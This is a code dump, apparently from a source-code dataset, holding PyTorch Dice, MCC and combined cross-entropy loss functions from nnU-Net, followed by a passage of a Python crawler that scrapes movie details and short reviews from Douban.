# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
from nnunet.training.loss_functions.TopK_loss import TopKLoss
from nnunet.training.loss_functions.crossentropy import RobustCrossEntropyLoss, MyRobustCrossEntropyLoss
from nnunet.utilities.nd_softmax import softmax_helper
from nnunet.utilities.tensor_utilities import sum_tensor
from torch import nn
import numpy as np
class GDL(nn.Module):
    def __init__(self, apply_nonlin=None, batch_dice=False, do_bg=True, smooth=1.,
                 square=False, square_volumes=False):
        """
        Generalized Dice Loss: soft Dice with per-class weights of 1/volume.

        square_volumes will square the weight term. The paper recommends
        square_volumes=True; I don't (just an intuition)
        """
        super(GDL, self).__init__()
        self.square_volumes = square_volumes
        self.square = square
        self.do_bg = do_bg
        self.batch_dice = batch_dice
        self.apply_nonlin = apply_nonlin
        self.smooth = smooth

    def forward(self, x, y, loss_mask=None):
        pred_shape = x.shape
        target_shape = y.shape

        # Reduce over spatial axes; include the batch axis for batch_dice.
        axes = list(range(2, len(pred_shape)))
        if self.batch_dice:
            axes = [0] + axes

        # Bring the target to (b, 1, ...) if it arrived without a channel axis.
        if len(pred_shape) != len(target_shape):
            y = y.view((target_shape[0], 1, *target_shape[1:]))

        if all(i == j for i, j in zip(x.shape, y.shape)):
            # Same shape as the prediction: gt is probably already one-hot.
            y_onehot = y
        else:
            labels = y.long()
            y_onehot = torch.zeros(pred_shape)
            if x.device.type == "cuda":
                y_onehot = y_onehot.cuda(x.device.index)
            y_onehot.scatter_(1, labels, 1)

        if self.apply_nonlin is not None:
            x = self.apply_nonlin(x)

        if not self.do_bg:
            # Drop the background channel from both prediction and target.
            x = x[:, 1:]
            y_onehot = y_onehot[:, 1:]

        tp, fp, fn, _ = get_tp_fp_fn_tn(x, y_onehot, axes, loss_mask, self.square)

        # GDL weight computation, we use 1/V; eps prevents division by zero.
        volumes = sum_tensor(y_onehot, axes) + 1e-6
        if self.square_volumes:
            volumes = volumes ** 2

        # Apply the per-class weights to the confusion counts.
        tp = tp / volumes
        fp = fp / volumes
        fn = fn / volumes

        # Collapse the class axis (axis 0 if the batch axis was reduced above).
        class_axis = 0 if self.batch_dice else 1
        tp = tp.sum(class_axis, keepdim=False)
        fp = fp.sum(class_axis, keepdim=False)
        fn = fn.sum(class_axis, keepdim=False)

        dc = (2 * tp + self.smooth) / (2 * tp + fp + fn + self.smooth)
        return -dc.mean()
def get_tp_fp_fn_tn(net_output, gt, axes=None, mask=None, square=False):
    """
    Compute soft true/false positive/negative maps between a prediction and a
    (possibly label-map) target.

    net_output must be (b, c, x, y(, z)))
    gt must be a label map (shape (b, 1, x, y(, z)) OR shape (b, x, y(, z))) or one hot encoding (b, c, x, y(, z))
    if mask is provided it must have shape (b, 1, x, y(, z)))
    :param net_output:
    :param gt:
    :param axes: can be (, ) = no summation
    :param mask: mask must be 1 for valid pixels and 0 for invalid pixels
    :param square: if True then fp, tp and fn will be squared before summation
    :return: tp, fp, fn, tn tensors, reduced over `axes` when non-empty
    """
    if axes is None:
        # Default: sum over all spatial axes, keep batch and channel.
        axes = tuple(range(2, net_output.ndim))

    # Building the one-hot target needs no gradients.
    with torch.no_grad():
        if net_output.ndim != gt.ndim:
            gt = gt.view((gt.shape[0], 1, *gt.shape[1:]))

        if net_output.shape == gt.shape:
            # Same shape as the prediction: gt is probably already one-hot.
            y_onehot = gt
        else:
            labels = gt.long()
            y_onehot = torch.zeros(net_output.shape)
            if net_output.device.type == "cuda":
                y_onehot = y_onehot.cuda(net_output.device.index)
            # Set a 1 at the channel given by each label value.
            y_onehot.scatter_(1, labels, 1)

    tp = net_output * y_onehot
    fp = net_output * (1 - y_onehot)
    fn = (1 - net_output) * y_onehot
    tn = (1 - net_output) * (1 - y_onehot)

    if mask is not None:
        # Zero out invalid pixels channel by channel (mask has one channel).
        valid = mask[:, 0]
        tp = torch.stack([c * valid for c in torch.unbind(tp, dim=1)], dim=1)
        fp = torch.stack([c * valid for c in torch.unbind(fp, dim=1)], dim=1)
        fn = torch.stack([c * valid for c in torch.unbind(fn, dim=1)], dim=1)
        tn = torch.stack([c * valid for c in torch.unbind(tn, dim=1)], dim=1)

    if square:
        tp, fp, fn, tn = tp ** 2, fp ** 2, fn ** 2, tn ** 2

    if len(axes) > 0:
        tp = sum_tensor(tp, axes, keepdim=False)
        fp = sum_tensor(fp, axes, keepdim=False)
        fn = sum_tensor(fn, axes, keepdim=False)
        tn = sum_tensor(tn, axes, keepdim=False)

    return tp, fp, fn, tn
class SoftDiceLoss(nn.Module):
    def __init__(self, apply_nonlin=None, batch_dice=False, do_bg=True, smooth=1.):
        """Soft (differentiable) Dice loss; forward returns the negative mean Dice."""
        super(SoftDiceLoss, self).__init__()
        self.do_bg = do_bg
        self.batch_dice = batch_dice
        self.apply_nonlin = apply_nonlin
        self.smooth = smooth

    def forward(self, x, y, loss_mask=None):
        # Reduce over spatial axes; include the batch axis for batch_dice.
        reduce_axes = list(range(2, x.ndim))
        if self.batch_dice:
            reduce_axes = [0] + reduce_axes

        if self.apply_nonlin is not None:
            x = self.apply_nonlin(x)

        tp, fp, fn, _ = get_tp_fp_fn_tn(x, y, reduce_axes, loss_mask, False)

        # Smoothed Dice; the extra 1e-8 guards against a zero denominator.
        dc = (2 * tp + self.smooth) / (2 * tp + fp + fn + self.smooth + 1e-8)

        if not self.do_bg:
            # Background is channel 0; axis position depends on batch_dice.
            dc = dc[1:] if self.batch_dice else dc[:, 1:]

        return -dc.mean()
class MySoftDiceLoss(nn.Module):
    def __init__(self, apply_nonlin=None, batch_dice=False, do_bg=True, smooth=1.):
        """Per-sample soft Dice loss: forward returns one value per batch element."""
        super(MySoftDiceLoss, self).__init__()
        self.do_bg = do_bg
        self.batch_dice = batch_dice
        self.apply_nonlin = apply_nonlin
        self.smooth = smooth

    def forward(self, x, y, loss_mask=None):
        # Reduce over spatial axes; include the batch axis for batch_dice.
        reduce_axes = list(range(2, x.ndim))
        if self.batch_dice:
            reduce_axes = [0] + reduce_axes

        if self.apply_nonlin is not None:
            x = self.apply_nonlin(x)

        tp, fp, fn, _ = get_tp_fp_fn_tn(x, y, reduce_axes, loss_mask, False)

        # Smoothed Dice; the extra 1e-8 guards against a zero denominator.
        dc = (2 * tp + self.smooth) / (2 * tp + fp + fn + self.smooth + 1e-8)

        if not self.do_bg:
            # NOTE(review): with batch_dice=True this leaves a 1-D tensor and the
            # mean over axis 1 below would fail; presumably batch_dice=False is
            # the intended configuration - confirm with callers.
            dc = dc[1:] if self.batch_dice else dc[:, 1:]

        # One loss value per sample (mean over the class axis).
        return -dc.mean(axis=1)
class DiceIndex(nn.Module):
    def __init__(self, apply_nonlin=softmax_helper, batch_dice=True, do_bg=False):
        """Soft Dice coefficient without smoothing: an evaluation metric, not a loss."""
        super(DiceIndex, self).__init__()
        self.do_bg = do_bg
        self.batch_dice = batch_dice
        self.apply_nonlin = apply_nonlin

    def forward(self, x, y, loss_mask=None):
        # Reduce over spatial axes; include the batch axis for batch_dice.
        reduce_axes = list(range(2, x.ndim))
        if self.batch_dice:
            reduce_axes = [0] + reduce_axes

        if self.apply_nonlin is not None:
            x = self.apply_nonlin(x)

        tp, fp, fn, _ = get_tp_fp_fn_tn(x, y, reduce_axes, loss_mask, False)

        # Unsmoothed Dice; 1e-8 only guards against an empty denominator.
        dc = (2 * tp) / (2 * tp + fp + fn + 1e-8)

        if not self.do_bg:
            dc = dc[1:] if self.batch_dice else dc[:, 1:]

        # Positive metric in [0, 1]; note the sign differs from the losses above.
        return dc.mean()
class MyDiceIndex(nn.Module):
    def __init__(self, apply_nonlin=softmax_helper, batch_dice=True, do_bg=False):
        """Per-sample soft Dice coefficient (metric, not a loss; no smoothing)."""
        super(MyDiceIndex, self).__init__()
        self.do_bg = do_bg
        self.batch_dice = batch_dice
        self.apply_nonlin = apply_nonlin

    def forward(self, x, y, loss_mask=None):
        # Reduce over spatial axes; include the batch axis for batch_dice.
        reduce_axes = list(range(2, x.ndim))
        if self.batch_dice:
            reduce_axes = [0] + reduce_axes

        if self.apply_nonlin is not None:
            x = self.apply_nonlin(x)

        tp, fp, fn, _ = get_tp_fp_fn_tn(x, y, reduce_axes, loss_mask, False)

        # Unsmoothed Dice; 1e-8 only guards against an empty denominator.
        dc = (2 * tp) / (2 * tp + fp + fn + 1e-8)

        if not self.do_bg:
            # NOTE(review): with batch_dice=True (the default here) this leaves a
            # 1-D tensor and mean(axis=1) below would fail; presumably callers
            # pass batch_dice=False - confirm.
            dc = dc[1:] if self.batch_dice else dc[:, 1:]

        # One Dice value per sample (mean over the class axis).
        return dc.mean(axis=1)
class MCCLoss(nn.Module):
    def __init__(self, apply_nonlin=None, batch_mcc=False, do_bg=True, smooth=0.0):
        """
        based on matthews correlation coefficient
        https://en.wikipedia.org/wiki/Matthews_correlation_coefficient

        Does not work. Really unstable. F this.
        """
        super(MCCLoss, self).__init__()
        self.smooth = smooth
        self.do_bg = do_bg
        self.batch_mcc = batch_mcc
        self.apply_nonlin = apply_nonlin

    def forward(self, x, y, loss_mask=None):
        shp_x = x.shape
        # Number of spatial voxels per sample; used to normalize the counts.
        voxels = np.prod(shp_x[2:])

        # Reduce over spatial axes; include the batch axis for batch_mcc.
        if self.batch_mcc:
            axes = [0] + list(range(2, len(shp_x)))
        else:
            axes = list(range(2, len(shp_x)))

        if self.apply_nonlin is not None:
            x = self.apply_nonlin(x)

        tp, fp, fn, tn = get_tp_fp_fn_tn(x, y, axes, loss_mask, False)

        # Normalize the confusion counts to keep the MCC terms in range.
        tp /= voxels
        fp /= voxels
        fn /= voxels
        tn /= voxels

        nominator = tp * tn - fp * fn + self.smooth
        # NOTE: with the default smooth=0.0 this denominator can be exactly 0,
        # yielding inf/NaN - consistent with the "really unstable" warning above.
        denominator = ((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn)) ** 0.5 + self.smooth

        mcc = nominator / denominator

        if not self.do_bg:
            # Background is channel 0; axis position depends on batch_mcc.
            if self.batch_mcc:
                mcc = mcc[1:]
            else:
                mcc = mcc[:, 1:]
        mcc = mcc.mean()

        # Negated so that a higher correlation yields a lower loss.
        return -mcc
class SoftDiceLossSquared(nn.Module):
    def __init__(self, apply_nonlin=None, batch_dice=False, do_bg=True, smooth=1.):
        """
        squares the terms in the denominator as proposed by Milletari et al.
        """
        super(SoftDiceLossSquared, self).__init__()
        self.do_bg = do_bg
        self.batch_dice = batch_dice
        self.apply_nonlin = apply_nonlin
        self.smooth = smooth

    def forward(self, x, y, loss_mask=None):
        # loss_mask is accepted for interface symmetry but never read here.
        pred_shape = x.shape
        target_shape = y.shape

        # Reduce over spatial axes; include the batch axis for batch_dice.
        axes = list(range(2, len(pred_shape)))
        if self.batch_dice:
            axes = [0] + axes

        if self.apply_nonlin is not None:
            x = self.apply_nonlin(x)

        # Building the one-hot target needs no gradients.
        with torch.no_grad():
            if len(pred_shape) != len(target_shape):
                y = y.view((target_shape[0], 1, *target_shape[1:]))

            if all(i == j for i, j in zip(x.shape, y.shape)):
                # Same shape as the prediction: gt is probably already one-hot.
                y_onehot = y
            else:
                labels = y.long()
                y_onehot = torch.zeros(pred_shape)
                if x.device.type == "cuda":
                    y_onehot = y_onehot.cuda(x.device.index)
                y_onehot.scatter_(1, labels, 1).float()

        intersect = x * y_onehot
        # The squared terms live in the denominator (Milletari variant).
        denominator = x ** 2 + y_onehot ** 2

        # Aggregation is done here (not in get_tp_fp_fn) because the squaring
        # must happen before the sum.
        intersect = sum_tensor(intersect, axes, False) + self.smooth
        denominator = sum_tensor(denominator, axes, False) + self.smooth

        dc = 2 * intersect / denominator

        if not self.do_bg:
            dc = dc[1:] if self.batch_dice else dc[:, 1:]

        return -dc.mean()
class MySoftDiceLossSquared(nn.Module):
    def __init__(self, apply_nonlin=None, batch_dice=False, do_bg=True, smooth=1.):
        """
        Per-sample variant of SoftDiceLossSquared: squares the terms in the
        denominator as proposed by Milletari et al. and returns one loss value
        per batch element instead of a scalar.
        """
        # BUGFIX: this used to call super(SoftDiceLossSquared, self).__init__(),
        # which raises TypeError at construction time because
        # MySoftDiceLossSquared does not inherit from SoftDiceLossSquared.
        super(MySoftDiceLossSquared, self).__init__()
        self.do_bg = do_bg
        self.batch_dice = batch_dice
        self.apply_nonlin = apply_nonlin
        self.smooth = smooth

    def forward(self, x, y, loss_mask=None):
        """
        Return a tensor with one negative squared-denominator Dice per sample.

        NOTE(review): dc.mean(axis=1) at the end assumes batch_dice=False (so
        dc has shape (b, c)); with batch_dice=True the reduction would fail -
        confirm intended usage. loss_mask is accepted but never read.
        """
        shp_x = x.shape
        shp_y = y.shape

        # Reduce over spatial axes; include the batch axis for batch_dice.
        if self.batch_dice:
            axes = [0] + list(range(2, len(shp_x)))
        else:
            axes = list(range(2, len(shp_x)))

        if self.apply_nonlin is not None:
            x = self.apply_nonlin(x)

        # Building the one-hot target needs no gradients.
        with torch.no_grad():
            if len(shp_x) != len(shp_y):
                y = y.view((shp_y[0], 1, *shp_y[1:]))

            if all([i == j for i, j in zip(x.shape, y.shape)]):
                # if this is the case then gt is probably already a one hot encoding
                y_onehot = y
            else:
                y = y.long()
                y_onehot = torch.zeros(shp_x)
                if x.device.type == "cuda":
                    y_onehot = y_onehot.cuda(x.device.index)
                y_onehot.scatter_(1, y, 1).float()

        intersect = x * y_onehot
        # values in the denominator get smoothed
        denominator = x ** 2 + y_onehot ** 2

        # Aggregation happens here (not in get_tp_fp_fn) because the squaring
        # must be applied before summation.
        intersect = sum_tensor(intersect, axes, False) + self.smooth
        denominator = sum_tensor(denominator, axes, False) + self.smooth

        dc = 2 * intersect / denominator

        if not self.do_bg:
            if self.batch_dice:
                dc = dc[1:]
            else:
                dc = dc[:, 1:]
        # One loss value per sample (mean over the class axis).
        dc = dc.mean(axis=1)
        return -dc
class DC_and_CE_loss(nn.Module):
    def __init__(self, soft_dice_kwargs, ce_kwargs, aggregate="sum", square_dice=False, weight_ce=1, weight_dice=1,
                 log_dice=False, ignore_label=None):
        """
        Weighted sum of soft Dice loss and (robust) cross entropy.

        CAREFUL. Weights for CE and Dice do not need to sum to one. You can set whatever you want.
        :param soft_dice_kwargs: forwarded to SoftDiceLoss / SoftDiceLossSquared
        :param ce_kwargs: forwarded to RobustCrossEntropyLoss
        :param aggregate: only "sum" is implemented
        :param square_dice: use the squared-denominator (Milletari) Dice variant
        :param weight_ce: multiplier for the CE term; 0 skips computing CE
        :param weight_dice: multiplier for the Dice term; 0 skips computing Dice
        :param log_dice: apply -log(-dice_loss) to the Dice term
        :param ignore_label: label value excluded from both loss terms
        """
        super(DC_and_CE_loss, self).__init__()
        if ignore_label is not None:
            assert not square_dice, 'not implemented'
            # Per-voxel CE is required so ignored voxels can be masked out.
            ce_kwargs['reduction'] = 'none'
        self.log_dice = log_dice
        self.weight_dice = weight_dice
        self.weight_ce = weight_ce
        self.aggregate = aggregate
        self.ce = RobustCrossEntropyLoss(**ce_kwargs)
        self.ignore_label = ignore_label

        if not square_dice:
            self.dc = SoftDiceLoss(apply_nonlin=softmax_helper, **soft_dice_kwargs)
        else:
            self.dc = SoftDiceLossSquared(apply_nonlin=softmax_helper, **soft_dice_kwargs)

    def forward(self, net_output, target):
        """
        target must be b, c, x, y(, z) with c=1
        :param net_output: raw network logits
        :param target: integer label map
        :return: weighted sum of the CE and Dice terms
        """
        if self.ignore_label is not None:
            assert target.shape[1] == 1, 'not implemented for one hot encoding'
            mask = target != self.ignore_label
            # BUGFIX: operate on a copy so the caller's target tensor is not
            # silently mutated (ignored voxels used to be zeroed in place).
            target = target.clone()
            target[~mask] = 0
            mask = mask.float()
        else:
            mask = None

        dc_loss = self.dc(net_output, target, loss_mask=mask) if self.weight_dice != 0 else 0
        if self.log_dice:
            # dc_loss is negative, so -log(-dc_loss) is well defined.
            dc_loss = -torch.log(-dc_loss)

        ce_loss = self.ce(net_output, target[:, 0].long()) if self.weight_ce != 0 else 0
        if self.ignore_label is not None:
            # Average the per-voxel CE over valid voxels only.
            ce_loss *= mask[:, 0]
            ce_loss = ce_loss.sum() / mask.sum()

        if self.aggregate == "sum":
            result = self.weight_ce * ce_loss + self.weight_dice * dc_loss
        else:
            raise NotImplementedError("nah son")  # reserved for other stuff (later)
        return result
class My_DC_and_CE_loss(nn.Module):
    def __init__(self, soft_dice_kwargs, ce_kwargs, aggregate="sum", square_dice=False, weight_ce=1, weight_dice=1,
                 log_dice=False, ignore_label=None):
        """
        Per-sample variant of DC_and_CE_loss: both terms are reduced per batch
        element rather than to a scalar.

        CAREFUL. Weights for CE and Dice do not need to sum to one. You can set whatever you want.
        :param soft_dice_kwargs: forwarded to MySoftDiceLoss / MySoftDiceLossSquared
        :param ce_kwargs: forwarded to MyRobustCrossEntropyLoss
        :param aggregate: only "sum" is implemented
        :param square_dice: use the squared-denominator (Milletari) Dice variant
        :param weight_ce: multiplier for the CE term; 0 skips computing CE
        :param weight_dice: multiplier for the Dice term; 0 skips computing Dice
        :param log_dice: apply -log(-dice_loss) to the Dice term
        :param ignore_label: label value excluded from both loss terms
        """
        super(My_DC_and_CE_loss, self).__init__()
        if ignore_label is not None:
            assert not square_dice, 'not implemented'
            # Per-voxel CE is required so ignored voxels can be masked out.
            ce_kwargs['reduction'] = 'none'
        self.log_dice = log_dice
        self.weight_dice = weight_dice
        self.weight_ce = weight_ce
        self.aggregate = aggregate
        self.ce = MyRobustCrossEntropyLoss(**ce_kwargs)
        self.ignore_label = ignore_label

        if not square_dice:
            self.dc = MySoftDiceLoss(apply_nonlin=softmax_helper, **soft_dice_kwargs)
        else:
            self.dc = MySoftDiceLossSquared(apply_nonlin=softmax_helper, **soft_dice_kwargs)

    def forward(self, net_output, target):
        """
        target must be b, c, x, y(, z) with c=1
        :param net_output: raw network logits
        :param target: integer label map
        :return: weighted per-sample sum of the CE and Dice terms
        """
        if self.ignore_label is not None:
            assert target.shape[1] == 1, 'not implemented for one hot encoding'
            mask = target != self.ignore_label
            # BUGFIX: operate on a copy so the caller's target tensor is not
            # silently mutated (ignored voxels used to be zeroed in place).
            target = target.clone()
            target[~mask] = 0
            mask = mask.float()
        else:
            mask = None

        dc_loss = self.dc(net_output, target, loss_mask=mask) if self.weight_dice != 0 else 0
        if self.log_dice:
            dc_loss = -torch.log(-dc_loss)

        if self.weight_ce != 0:
            ce_loss = self.ce(net_output, target[:, 0].long())
            # BUGFIX + generalization: reduce over ALL non-batch axes so 3D
            # patches work too. The previous torch.mean(ce_loss, [1, 2]) only
            # supported 2D inputs, and was applied even when weight_ce == 0,
            # which passed the plain int 0 to torch.mean and crashed.
            ce_loss = ce_loss.mean(dim=list(range(1, ce_loss.ndim)))
        else:
            ce_loss = 0

        if self.ignore_label is not None:
            ce_loss *= mask[:, 0]
            ce_loss = ce_loss.sum() / mask.sum()

        if self.aggregate == "sum":
            result = self.weight_ce * ce_loss + self.weight_dice * dc_loss
        else:
            raise NotImplementedError("nah son")  # reserved for other stuff (later)
        return result
class DC_and_BCE_loss(nn.Module):
    def __init__(self, bce_kwargs, soft_dice_kwargs, aggregate="sum"):
        """
        Sigmoid-based sum of soft Dice and binary cross entropy (with logits).

        DO NOT APPLY NONLINEARITY IN YOUR NETWORK!
        THIS LOSS IS INTENDED TO BE USED FOR BRATS REGIONS ONLY
        :param soft_dice_kwargs:
        :param bce_kwargs:
        :param aggregate:
        """
        super(DC_and_BCE_loss, self).__init__()
        self.aggregate = aggregate
        self.ce = nn.BCEWithLogitsLoss(**bce_kwargs)
        self.dc = SoftDiceLoss(apply_nonlin=torch.sigmoid, **soft_dice_kwargs)

    def forward(self, net_output, target):
        bce_term = self.ce(net_output, target)
        dice_term = self.dc(net_output, target)
        if self.aggregate != "sum":
            raise NotImplementedError("nah son")  # reserved for other stuff (later)
        return bce_term + dice_term
class GDL_and_CE_loss(nn.Module):
    def __init__(self, gdl_dice_kwargs, ce_kwargs, aggregate="sum"):
        """Sum of Generalized Dice Loss and robust cross entropy."""
        super(GDL_and_CE_loss, self).__init__()
        self.aggregate = aggregate
        self.ce = RobustCrossEntropyLoss(**ce_kwargs)
        self.dc = GDL(softmax_helper, **gdl_dice_kwargs)

    def forward(self, net_output, target):
        gdl_term = self.dc(net_output, target)
        ce_term = self.ce(net_output, target)
        if self.aggregate != "sum":
            raise NotImplementedError("nah son")  # reserved for other stuff (later)
        return ce_term + gdl_term
class DC_and_topk_loss(nn.Module):
    def __init__(self, soft_dice_kwargs, ce_kwargs, aggregate="sum", square_dice=False):
        """Sum of soft Dice loss and top-k cross entropy."""
        super(DC_and_topk_loss, self).__init__()
        self.aggregate = aggregate
        self.ce = TopKLoss(**ce_kwargs)
        dice_cls = SoftDiceLossSquared if square_dice else SoftDiceLoss
        self.dc = dice_cls(apply_nonlin=softmax_helper, **soft_dice_kwargs)

    def forward(self, net_output, target):
        dice_term = self.dc(net_output, target)
        topk_term = self.ce(net_output, target)
        if self.aggregate != "sum":
            raise NotImplementedError("nah son")  # reserved for other stuff (later?)
        return topk_term + dice_term
| 32.171733 | 121 | 0.570457 |
ace94a7c8f51ad1f558855737cbe49484ed53542 | 9,928 | py | Python | DouBanMovie/douban.py | MashiMaroLjc/ML-and-DM-in-action | 1c1230267768c0caf0a496e6d9d2558f2876c384 | [
"Apache-2.0"
] | 370 | 2016-04-28T13:59:00.000Z | 2022-02-18T10:37:54.000Z | DouBanMovie/douban.py | rotman173/ML-and-DM-in-action | 1c1230267768c0caf0a496e6d9d2558f2876c384 | [
"Apache-2.0"
] | 8 | 2016-05-06T10:55:40.000Z | 2019-05-30T05:06:03.000Z | DouBanMovie/douban.py | rotman173/ML-and-DM-in-action | 1c1230267768c0caf0a496e6d9d2558f2876c384 | [
"Apache-2.0"
] | 177 | 2016-05-07T18:03:29.000Z | 2021-04-13T09:41:59.000Z | #coding:utf-8
#多一个线程时不时序列化
#{
# visited
# n
#}
#载入时自动使viited.pop()作为最新的url
#n = num
#提供一些爬取豆瓣的api
import requests
from bs4 import BeautifulSoup
from queue import Queue
import threading
import re
import time
import os.path
import json
import random
# Request headers sent with every crawl request to movie.douban.com.
# Several entries mimic a 2016-era desktop Chrome browser.
HEADER = {
    "Host": "movie.douban.com",
    "scheme": "https",
    "version": "HTTP/1.1",
    "accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q = 0.8",
    "accept-encoding": "gzip,deflate,sdch",
    "accept-language": "zh-CN,zh;q=0.8",
    "cache-control": "max-age=0",
    "cookie": '',  # add your cookie (a logged-in Douban session cookie) before crawling
    "referer": "https://book.douban.com/subject/26757148/?icn=index-editionrecommend",
    # NOTE(review): this header name contains a stray space ("insecure -requests")
    # - likely a typo, kept as-is to preserve behavior.
    "upgrade-insecure -requests": "1",
    "user-agent": "Mozilla / 5.0(WindowsNT6.3;"\
        "WOW64) AppleWebKit / 537.36(KHTML, likeGecko) Chrome / 48.0.2564.116Safari / 537.36"
}
import logging
# Append-mode file logging so crawl progress survives restarts.
logging.basicConfig(level=logging.INFO,
                    format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',
                    datefmt='%a, %d %b %Y %H:%M:%S',
                    filename='spider.log',
                    filemode='a')
class myQueue(Queue):
    """A FIFO Queue that can be snapshotted to a list without consuming items."""

    def __init__(self, type1=None, type2=None):
        # type1/type2 are accepted for backward compatibility with existing
        # callers but are (and always were) unused.
        super().__init__()

    def to_list(self):
        """Return the queued items in FIFO order without removing them.

        BUGFIX: the previous implementation cycled every item through
        get()/put(). Each put() increments Queue.unfinished_tasks, so every
        snapshot inflated that counter and would make Queue.join() hang
        forever; the cycle was also not atomic with respect to other threads.
        Reading the underlying deque under the queue's own mutex fixes both.
        """
        with self.mutex:
            return list(self.queue)
class DouBanMovieSpider:
    """Crawler for movie.douban.com.

    Walks movie pages starting from the site's front page, extracts metadata
    and short reviews into per-movie JSON files, and periodically checkpoints
    its state (visited URLs, counter, pending queue) to info.txt so a crawl
    can be resumed via configure().
    """

    def __init__(self):
        self._visited = []              # URLs already scraped, in visit order
        self._n = 1                     # 1-based counter of movies saved so far
        self._url = "https://movie.douban.com/"  # crawl entry point
        self._mutex = threading.Lock()  # guards _visited between crawl and checkpoint threads
        self._threading_flag = True     # set False to stop the checkpoint thread
        self._mission = myQueue()       # pending URLs to crawl (FIFO)

    # Load crawl state previously serialized by _check().
    def configure(self, filename):
        """Restore visited list, counter and mission queue from a JSON file,
        then resume from the most recently visited URL."""
        fp = open(filename, 'r')
        js = json.load(fp)
        fp.close()
        self._visited = js.get("visited", [])
        self._n = int(js.get("n", 1))
        mission_list = js.get("mission", myQueue())
        if isinstance(mission_list, myQueue):
            self._mission = mission_list
        else:
            # JSON stores the mission as a plain list; refill the queue.
            for url in mission_list:
                self._mission.put(url)
        if len(self._visited) >= 1:
            # Resume from the last visited URL (popped so it is re-crawled).
            self._url = self._visited.pop()
        print("now have %d mission totally" % (self._mission.qsize()))

    # Periodic checkpoint thread body: serialize state every 15 new URLs.
    # (The original comment said 50, but the code checks length % 15.)
    def _check(self):
        temp = -1  # last length at which a checkpoint was written
        while self._threading_flag:
            flag = False
            length = len(self._visited)
            # Only write when the count hits a new multiple of 15.
            if (length % 15 == 0) and temp != length:
                flag = True
                temp = length
            if flag:
                if self._mutex.acquire():
                    try:
                        fp = open("info.txt", "w")
                        json.dump({
                            "visited": self._visited,
                            "n": length,
                            "mission": self._mission.to_list()
                        }, fp)
                        fp.close()
                        logging.info("Write information succeed!")
                    except Exception as err:
                        logging.info("Check Error %s" % (str(err)))
                    self._mutex.release()
            time.sleep(1)
        # Final checkpoint once the crawl loop has finished.
        fp = open("info.txt", "w")
        json.dump({
            "visited": self._visited,
            "n": len(self._visited),
            "mission": self._mission.to_list()
        }, fp)
        fp.close()

    # Extract the newly-released movies advertised on the front page.
    def _new_movie(self, html):
        soup = BeautifulSoup(html, "html.parser")
        li_list = soup.find_all('li')
        new_movie_list = []
        for li in li_list:
            # Only <li> elements carrying data-title are movie entries.
            if li.get("data-title"):
                title = li.get("data-title", "unknown")
                release = li.get("data-release", "unknown")
                duration = li.get("data-duration", "unknown")
                region = li.get("data-region", "unknown")
                director = li.get("data-director", "unknown")
                actors = li.get("data-actors", "unknown")
                new_movie_list.append(
                    (title, release, duration, region, director, actors)
                )
        return new_movie_list

    # Fetch the front page and return the newest movies as tuples.
    def get_new_movie(self, timeout=5):
        """Return a list of (title, release, duration, region, director,
        actors) tuples, or [] if the front page could not be fetched."""
        response = requests.get("https://movie.douban.com/", headers=HEADER, timeout=timeout)
        if str(response.status_code) == '200':
            response.encoding = "utf-8"
            html = response.text
            movie_info_list = self._new_movie(html)
            return movie_info_list
        else:
            return []

    # Parse one movie page into a metadata dict (note: returns a dict, not a list).
    def _get_info(self, html):
        soup = BeautifulSoup(html, "html.parser")
        span = soup.find("span", attrs={"property": "v:itemreviewed"})
        # title
        try:
            title = span.string
        except Exception:
            title = ""
        # director name
        d_a = soup.find("a", attrs={"rel": "v:directedBy"})
        try:
            d_name = d_a.string
        except Exception:
            d_name = ""
        # list of screenwriter names (celebrity links without a rel attribute)
        w_list = soup.find_all(href=re.compile("/celebrity/\d{7}/"), attrs={"rel": ""})
        try:
            w_name_list = [name.string for name in w_list]
        except Exception:
            w_name_list = [""]
        # list of leading actor names
        actor_list = soup.find_all(attrs={"rel": "v:starring"})
        try:
            actor_name_list = [name.string for name in actor_list]
        except Exception:
            actor_name_list = [""]
        # movie genre
        movie_type_span = soup.find("span", attrs={"property": "v:genre"})
        try:
            movie_type_name = movie_type_span.string
        except Exception:
            movie_type_name = ""
        # runtime
        runtime_span = soup.find("span", attrs={"property": "v:runtime"})
        try:
            runtime = runtime_span.string
        except Exception:
            runtime = ""
        # production country/region, extracted from the raw HTML
        # NOTE(review): the +16 offset presumably equals the length of the
        # marker string "制片国家/地区:</span>" - confirm if the page layout changes.
        area_index = html.find("制片国家/地区:</span>")
        end_index = html.find("br", area_index)
        if area_index != -1 and end_index != -1:
            area = html[area_index + 16:end_index - 1]
        else:
            area = ""
        # exact release date
        date_span = soup.find("span", attrs={"property": "v:initialReleaseDate"})
        try:
            date = date_span.string
        except Exception:
            date = ""
        # rating ("-1" signals a missing rating)
        star_strong = soup.find("strong", attrs={"property": "v:average"})
        try:
            star = star_strong.string
        except Exception:
            star = "-1"
        # review section
        comment_div_list = soup.find_all("div", attrs={"class": "comment"})

        # Pull the plain review text out of one comment block.
        def _get_comment(tag):
            try:
                return tag.p.string.replace(" ", "").replace("\n", "")
            except Exception:
                return ""
        comment_list = [_get_comment(comment) for comment in comment_div_list]
        # aggregate the movie information
        info = {
            "title": title,
            "director": d_name,
            "writer": "/".join(w_name_list),
            "actor": "/".join(actor_name_list),
            "type": movie_type_name,
            "runtime": runtime,
            "area": area,
            "date": date,
            "star": star,
            "comment_list": comment_list
        }
        return info

    # Fetch a single movie URL and parse it.
    def get_info_from_movie(self, url, timeout=5):
        """Return the parsed metadata dict for `url`, or {} on a non-200 reply."""
        response = requests.get(url, headers=HEADER, timeout=timeout)
        if str(response.status_code) == '200':
            response.encoding = "utf-8"
            html = response.text
            return self._get_info(html)
        else:
            return dict()

    # Collect further movie URLs to crawl from a page's HTML.
    def _get_movie_url(self, html):
        # Pattern for movie links reachable from the front page.
        exp = "https://movie.douban.com/subject/\d{8}/\?from"
        soup = BeautifulSoup(html, "html.parser")
        movie_list = soup.find_all("a", href=re.compile(exp))
        url_list = [movie.get("href") for movie in movie_list]
        return url_list

